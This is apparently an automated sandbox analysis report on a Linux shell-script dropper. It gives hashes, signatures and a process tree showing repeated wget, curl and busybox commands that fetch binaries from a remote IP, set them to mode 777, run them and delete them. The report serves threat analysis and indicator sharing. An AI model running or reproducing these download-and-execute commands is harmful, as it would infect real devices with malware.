Analysis
-
max time kernel
78s -
max time network
80s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28/10/2024, 02:34
Static task
static1
Behavioral task
behavioral1
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
-
Size
10KB
-
MD5
7b4d271e102cd41b604d6fea5d979e2d
-
SHA1
56b5d99bae8b5353d96d700fda3d30d396cc9828
-
SHA256
56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91
-
SHA512
ac1884092a54f7829359fccf4958bfc2add2cc2a89006fc0fadd30221a55d9c559a91e0a83747d00161c63e152fef77f819c20574cbd81fb4bdde05f1ed486c5
-
SSDEEP
192:C83Wep8P79w808A8uBpzuRtUltYv3WfjIK3qRtUlta808A8uBpKv3WfjaB83hP7W:Crep8P79w808A8uBpzyv3WfjIK38808f
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 931 chmod 949 chmod 808 chmod 871 chmod 822 chmod 739 chmod 766 chmod 973 chmod 865 chmod 955 chmod 901 chmod 925 chmod 814 chmod 859 chmod 883 chmod 889 chmod 907 chmod 937 chmod 967 chmod 733 chmod 877 chmod 919 chmod 943 chmod 895 chmod 913 chmod 961 chmod 746 chmod 788 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms 734 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt 740 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF 747 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs 767 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa 790 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB 809 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S 815 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo 823 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K 860 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f 866 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU 872 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD 878 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF 884 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 890 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K 896 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f 902 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU 908 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo 914 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF 920 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 926 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD 932 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt 938 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF 944 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs 950 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa 956 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms 962 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB 968 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S 974 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 903 rm 862 wget 864 busybox 866 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f 867 rm 902 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f 863 curl 898 wget 899 curl 900 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD curl File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt curl File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms curl File opened for modification /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S curl File opened for modification /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K curl File opened for modification /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa curl File opened for modification /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD curl File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt curl File opened for modification /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF curl File opened for modification /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K curl File opened for modification /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f curl File opened for modification /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB curl File opened for modification /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU curl File opened for modification /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs curl File opened for modification /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB curl File opened for modification /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs curl File opened for modification /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 curl File opened for modification /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa curl File opened for modification /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo curl File opened for modification /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF curl File opened for modification /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f curl File opened for modification /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU curl File opened for modification /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF curl File opened for modification /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S curl File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms curl File opened for modification /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF curl File opened for modification /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo curl File opened for modification /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 curl
Processes
-
/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh1⤵PID:702
-
/bin/rm/bin/rm bins.sh2⤵PID:705
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:709
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:725
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:732
-
-
/bin/chmodchmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms2⤵PID:735
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:736
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:738
-
-
/bin/chmodchmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt2⤵PID:741
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:742
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:744
-
-
/bin/chmodchmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF2⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:751
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:762
-
-
/bin/chmodchmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵
- Executes dropped EXE
PID:767
-
-
/bin/rmrm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs2⤵PID:771
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:772
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:777
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:784
-
-
/bin/chmodchmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵
- Executes dropped EXE
PID:790
-
-
/bin/rmrm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa2⤵PID:793
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:795
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:807
-
-
/bin/chmodchmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB2⤵PID:810
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:811
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:813
-
-
/bin/chmodchmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S2⤵PID:816
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:817
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:819
-
-
/bin/chmodchmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:827
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:828
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:849
-
-
/bin/chmodchmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:861
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:864
-
-
/bin/chmodchmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:866
-
-
/bin/rmrm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:867
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:870
-
-
/bin/chmodchmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:876
-
-
/bin/chmodchmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:882
-
-
/bin/chmodchmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:888
-
-
/bin/chmodchmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:894
-
-
/bin/chmodchmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:898
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:900
-
-
/bin/chmodchmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:902
-
-
/bin/rmrm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f2⤵
- System Network Configuration Discovery
PID:903
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:906
-
-
/bin/chmodchmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:912
-
-
/bin/chmodchmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:918
-
-
/bin/chmodchmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:924
-
-
/bin/chmodchmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ02⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD2⤵PID:928
-
-
